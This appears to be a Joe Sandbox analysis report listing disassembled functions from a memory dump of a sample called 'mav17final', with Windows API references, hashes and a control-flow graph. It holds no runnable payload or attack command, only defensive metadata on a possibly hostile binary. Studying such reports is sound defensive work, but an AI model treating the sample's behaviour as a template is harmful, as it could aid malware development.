                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 2210144848-0
                                                  • Opcode ID: 45cbb135cd0f85d1d846e2e465f9ea49a45de6ab8f9da7c0c0df81e094fb2cd4
                                                  • Instruction ID: a54133e2aa2c4962c04ab44bf8589ee872aedfe28775b3ced22d1d0701fad03c
                                                  • Opcode Fuzzy Hash: 45cbb135cd0f85d1d846e2e465f9ea49a45de6ab8f9da7c0c0df81e094fb2cd4
                                                  • Instruction Fuzzy Hash: 5A817022E18652A9FB70BB7598C0ABCA7A1FB54BA4F844135DE0E536B1DF3CA445C730
                                                  Function 00007FF79EA4BFAC Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 4144305933-0
                                                  • Opcode ID: 902934ce287785604c65689b262d124d2bfc3c88a04624b8aa705ccf2e41092b
                                                  • Instruction ID: d2a96130dfba234a6a2ab14c7937107e0edb631d460a7ea7ba34ed218b4910fb
                                                  • Opcode Fuzzy Hash: 902934ce287785604c65689b262d124d2bfc3c88a04624b8aa705ccf2e41092b
                                                  • Instruction Fuzzy Hash: 4D314820E0964245FA75BB7595D5BB9E281EF81784FC54034E90E4B2F3EE2DA8448331
                                                  Function 00007FF79EA5B2D4 Relevance: 6.2, APIs: 4, Instructions: 161COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1015 7ff79ea5b2d4-7ff79ea5b311 1016 7ff79ea5b4bc-7ff79ea5b4c7 call 7ff79ea5137c 1015->1016 1017 7ff79ea5b317-7ff79ea5b31d 1015->1017 1023 7ff79ea5b4cb-7ff79ea5b4e7 call 7ff79ea4bbf0 1016->1023 1017->1016 1018 7ff79ea5b323-7ff79ea5b32b 1017->1018 1018->1016 1020 7ff79ea5b331-7ff79ea5b334 1018->1020 1020->1016 1022 7ff79ea5b33a-7ff79ea5b34b 1020->1022 1024 7ff79ea5b34d-7ff79ea5b356 call 7ff79ea5b274 1022->1024 1025 7ff79ea5b375-7ff79ea5b379 1022->1025 1024->1016 1032 7ff79ea5b35c-7ff79ea5b35f 1024->1032 1025->1016 1029 7ff79ea5b37f-7ff79ea5b383 1025->1029 1029->1016 1031 7ff79ea5b389-7ff79ea5b38d 1029->1031 1031->1016 1033 7ff79ea5b393-7ff79ea5b3a3 call 7ff79ea5b274 1031->1033 1032->1016 1034 7ff79ea5b365-7ff79ea5b368 1032->1034 1038 7ff79ea5b3ac call 7ff79ea61acc 1033->1038 1039 7ff79ea5b3a5-7ff79ea5b3a8 1033->1039 1034->1016 1036 7ff79ea5b36e 1034->1036 1036->1025 1042 7ff79ea5b3b1-7ff79ea5b3c8 call 7ff79ea60ec8 1038->1042 1039->1038 1040 7ff79ea5b3aa 1039->1040 1040->1038 1045 7ff79ea5b3ce-7ff79ea5b3d9 call 7ff79ea60ef8 1042->1045 1046 7ff79ea5b4e8-7ff79ea5b4ff call 7ff79ea567e8 1042->1046 1045->1046 1051 7ff79ea5b3df-7ff79ea5b3ea call 7ff79ea60f28 1045->1051 1051->1046 1054 7ff79ea5b3f0-7ff79ea5b481 1051->1054 1055 7ff79ea5b4b7-7ff79ea5b4ba 1054->1055 1056 7ff79ea5b483-7ff79ea5b49d 1054->1056 1055->1023 1057 7ff79ea5b49f-7ff79ea5b4a3 1056->1057 1058 7ff79ea5b4b2-7ff79ea5b4b5 1056->1058 1057->1058 1059 7ff79ea5b4a5-7ff79ea5b4b0 call 7ff79ea61b0c 1057->1059 1058->1023 1059->1055 1059->1058
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _get_daylight$_isindst
                                                  • String ID:
                                                  • API String ID: 4170891091-0
                                                  • Opcode ID: 9b03c73119b101001587424fb7506d1f48776e9a435598c7eabfeca695007573
                                                  • Instruction ID: e1019eea12561b81a1be1de34916ff9583439095cca5c6f467e54f29dd393e45
                                                  • Opcode Fuzzy Hash: 9b03c73119b101001587424fb7506d1f48776e9a435598c7eabfeca695007573
                                                  • Instruction Fuzzy Hash: 3651A372F045128AEB34EB7499C1ABCB7A1FB5035AF900139DE1E56AF5DF3CA5428720
                                                  Function 00007FF79EA515F0 Relevance: 4.6, APIs: 3, Instructions: 92fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateDriveFileHandleType_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 2907017715-0
                                                  • Opcode ID: 4d02e445216646654ec4cb930eb9345762960bbf98acfedd0a5c8f970fbd01a2
                                                  • Instruction ID: 553c4ea36094fb1a64014d2dc7f9ddf26ba4c80e42e2e31b85362aff81499037
                                                  • Opcode Fuzzy Hash: 4d02e445216646654ec4cb930eb9345762960bbf98acfedd0a5c8f970fbd01a2
                                                  • Instruction Fuzzy Hash: 4631EA72D08B4146E660AF35954067DB690FFB57A4F544335EA6C03AF2DF3CE1A08760
                                                  Function 00007FF79EA55A9C Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 1dcc90188591506fda0e7bd0332cee00154446f2bed4396dbac5adb68666eb5c
                                                  • Instruction ID: 5bea6764bb9bb0cd32840e03f2a5a4821fa960026c5d0a163257057be73dc260
                                                  • Opcode Fuzzy Hash: 1dcc90188591506fda0e7bd0332cee00154446f2bed4396dbac5adb68666eb5c
                                                  • Instruction Fuzzy Hash: 55E09A20A0460646EA647B319CD9A7DB262EFD9B41F905438D90A433B2CE7DE4488771
                                                  Function 00007FF79EA5A8F8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: try_get_function
                                                  • String ID: AppPolicyGetProcessTerminationMethod
                                                  • API String ID: 2742660187-2031265017
                                                  • Opcode ID: a9000b520e5bb55d7b9ef04e22633337cab00bbd09e3a2f03b535145424be1de
                                                  • Instruction ID: 9631b4e8334f3df2362059a493e169f11221f4a6595209167df5924e42bddbf8
                                                  • Opcode Fuzzy Hash: a9000b520e5bb55d7b9ef04e22633337cab00bbd09e3a2f03b535145424be1de
                                                  • Instruction Fuzzy Hash: 74E04FA1F05D4695FA2467B5A8849B09251DF09B70FC85331D93D0A3F0AE2C9AA68230
                                                  Function 00007FF79EA4DF68 Relevance: 3.2, APIs: 2, Instructions: 175COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: a7c7f9442e0671f2e73c72eb413d0c0572ec8599d986a26bd203810d182ff316
                                                  • Instruction ID: ecb8e0291a5b3910d554c39b91f46dade8df58a966f4b4e304c085b0fc18d839
                                                  • Opcode Fuzzy Hash: a7c7f9442e0671f2e73c72eb413d0c0572ec8599d986a26bd203810d182ff316
                                                  • Instruction Fuzzy Hash: 5651F661B0924246F674BF359480B7AE691FF94BA4F848630DD6D0B7E5EE3CD4018731
                                                  Function 00007FF79EA56988 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ChangeCloseErrorFindLastNotification
                                                  • String ID:
                                                  • API String ID: 1687624791-0
                                                  • Opcode ID: 52a9a96c7c695bcaa34876d88a40ca02b107573ee7e4230001ae4ff69ccc344f
                                                  • Instruction ID: fda4def7f1a997e51b4d4a76f5b4cc50257a1f40e5cdce5f6014b7ff38735cc1
                                                  • Opcode Fuzzy Hash: 52a9a96c7c695bcaa34876d88a40ca02b107573ee7e4230001ae4ff69ccc344f
                                                  • Instruction Fuzzy Hash: 6E119D21B1C64289EEB0777194D0A7CA292DFC1B64F944235DA2E472F2CE6CA8844232
                                                  Function 00007FF79EA57920 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointerEx.KERNELBASE(?,?,?,00007FF79EA5864F,?,?,?,?,?,?,?,?,?,?,?,00007FF79EA58577), ref: 00007FF79EA57964
                                                  • GetLastError.KERNEL32(?,?,?,00007FF79EA5864F,?,?,?,?,?,?,?,?,?,?,?,00007FF79EA58577), ref: 00007FF79EA5796E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastPointer
                                                  • String ID:
                                                  • API String ID: 2976181284-0
                                                  • Opcode ID: 1fa03f2e33758bcf25e4d2f540cbfa3ae257ed145adf2c3b33bcffd7bd395a0d
                                                  • Instruction ID: 7f2538540da3502dda5a8ec8990b3578dd24b3c2b3c31fa0964c6ecfb9a9a0bf
                                                  • Opcode Fuzzy Hash: 1fa03f2e33758bcf25e4d2f540cbfa3ae257ed145adf2c3b33bcffd7bd395a0d
                                                  • Instruction Fuzzy Hash: F901A561A18A93C1DE60AB39A49447DA651EF95BF0F944331EA7E077F4CE3CD8518330
                                                  Function 00007FF79EA53CD4 Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79EA53B51), ref: 00007FF79EA53CF7
                                                  • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79EA53B51), ref: 00007FF79EA53D0D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Time$System$FileLocalSpecific
                                                  • String ID:
                                                  • API String ID: 1707611234-0
                                                  • Opcode ID: e65bb3be7710d7fa3f2f1eb35ccfba932cfd64f7113b80078c6e28dbae587082
                                                  • Instruction ID: 84fdbfe30ad415f35094eef16e9305cce332f4a585785255ed0d610e70b8792a
                                                  • Opcode Fuzzy Hash: e65bb3be7710d7fa3f2f1eb35ccfba932cfd64f7113b80078c6e28dbae587082
                                                  • Instruction Fuzzy Hash: B501823291C651C2D7606F25A48157EF7B0FB81B21F900236E6AD455E9DF7DD014CB30
                                                  Function 00007FF79EA542C0 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID:
                                                  • API String ID: 2018770650-0
                                                  • Opcode ID: a6953bcd37a83dcb46a77d2c6cd0229bd820944d3ec2b1ee707b079e61bd8457
                                                  • Instruction ID: 6c52491a96dbe564901ed6486782cc2c6b7ecbe54543ff5a1d7bde6575f8039f
                                                  • Opcode Fuzzy Hash: a6953bcd37a83dcb46a77d2c6cd0229bd820944d3ec2b1ee707b079e61bd8457
                                                  • Instruction Fuzzy Hash: 36D0C918E1C91286EA743772188583CA194EF95B71FD00A70C02A812F1DE1CA0660535
                                                  Function 00007FF79EA53A3C Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DirectoryErrorLastRemove
                                                  • String ID:
                                                  • API String ID: 377330604-0
                                                  • Opcode ID: 4415ce3ca6a3ef02158fed96bc1674317c9c2b00140f80cb3181803c65901f46
                                                  • Instruction ID: 5ae649550474fe99ddf1e7ef2e689423d1c478f41e93e08541c236adcf329ca5
                                                  • Opcode Fuzzy Hash: 4415ce3ca6a3ef02158fed96bc1674317c9c2b00140f80cb3181803c65901f46
                                                  • Instruction Fuzzy Hash: AFD0C914E1A90295EE7437720CC587CA190DFA5B21FD00A70C11D812F6DE1DA0891131
                                                  Function 00007FF79EA47C40 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_findclose
                                                  • String ID:
                                                  • API String ID: 2772937645-0
                                                  • Opcode ID: 4b02f28466bbb3a65e09881e6996b1a42f98d106f54d684e0ace10e4073afd8c
                                                  • Instruction ID: cc3665cdb0d7cd3b1a58d87d979fa45a4e66c0b4bcbb0d765a50dcf37f4562da
                                                  • Opcode Fuzzy Hash: 4b02f28466bbb3a65e09881e6996b1a42f98d106f54d684e0ace10e4073afd8c
                                                  • Instruction Fuzzy Hash: 4271A053E18AC581E621DB2CD5452FDA360F7A9B4CF94E321DB9C125A2EF28E2D9C710
                                                  Function 00007FF79EA4E544 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: 6ee8ce3a2e5d7e1d08b1eda748974059655e9d0621e3d5ae4304ca997f1fd0c8
                                                  • Instruction ID: 3b4cf8e43a6f427799a867cc29841e7b346ff5cd631932d01a775b48838baf94
                                                  • Opcode Fuzzy Hash: 6ee8ce3a2e5d7e1d08b1eda748974059655e9d0621e3d5ae4304ca997f1fd0c8
                                                  • Instruction Fuzzy Hash: 2541F861B0825546FAB4AF365580939F295EF44FE4F848234ED2E4B7E5EE3CE4514331
                                                  Function 00007FF79EA576C4 Relevance: 1.6, APIs: 1, Instructions: 104COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: 3292c06f082d69c1996a4aa7561643ea988474f8832e5bbccfb5cd7a3b6ac64c
                                                  • Instruction ID: bcbe13ae18758015aae2e73f0e573ec16b3ee32c9440dcbac121dd395f34fce1
                                                  • Opcode Fuzzy Hash: 3292c06f082d69c1996a4aa7561643ea988474f8832e5bbccfb5cd7a3b6ac64c
                                                  • Instruction Fuzzy Hash: E241E632E1820257EA74EB38D680A7C77A1FB55754F900135EA4D577A1CF2CE862C7B0
                                                  Function 00007FF79EA547A4 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: 2f013d10c43b4120ccc62c22cebfe46315bcb9e8ffda91ad25067506f0f4438f
                                                  • Instruction ID: 4757a97425dc1e6e686327f8a8b9a562c4b3a6390432469141dc21a1ece70eb9
                                                  • Opcode Fuzzy Hash: 2f013d10c43b4120ccc62c22cebfe46315bcb9e8ffda91ad25067506f0f4438f
                                                  • Instruction Fuzzy Hash: 5031A222E0CA8685EA74AB358594B7CA790EB40FD4F844535DA1E077FADE38E4418330
                                                  Function 00007FF79EA481B0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
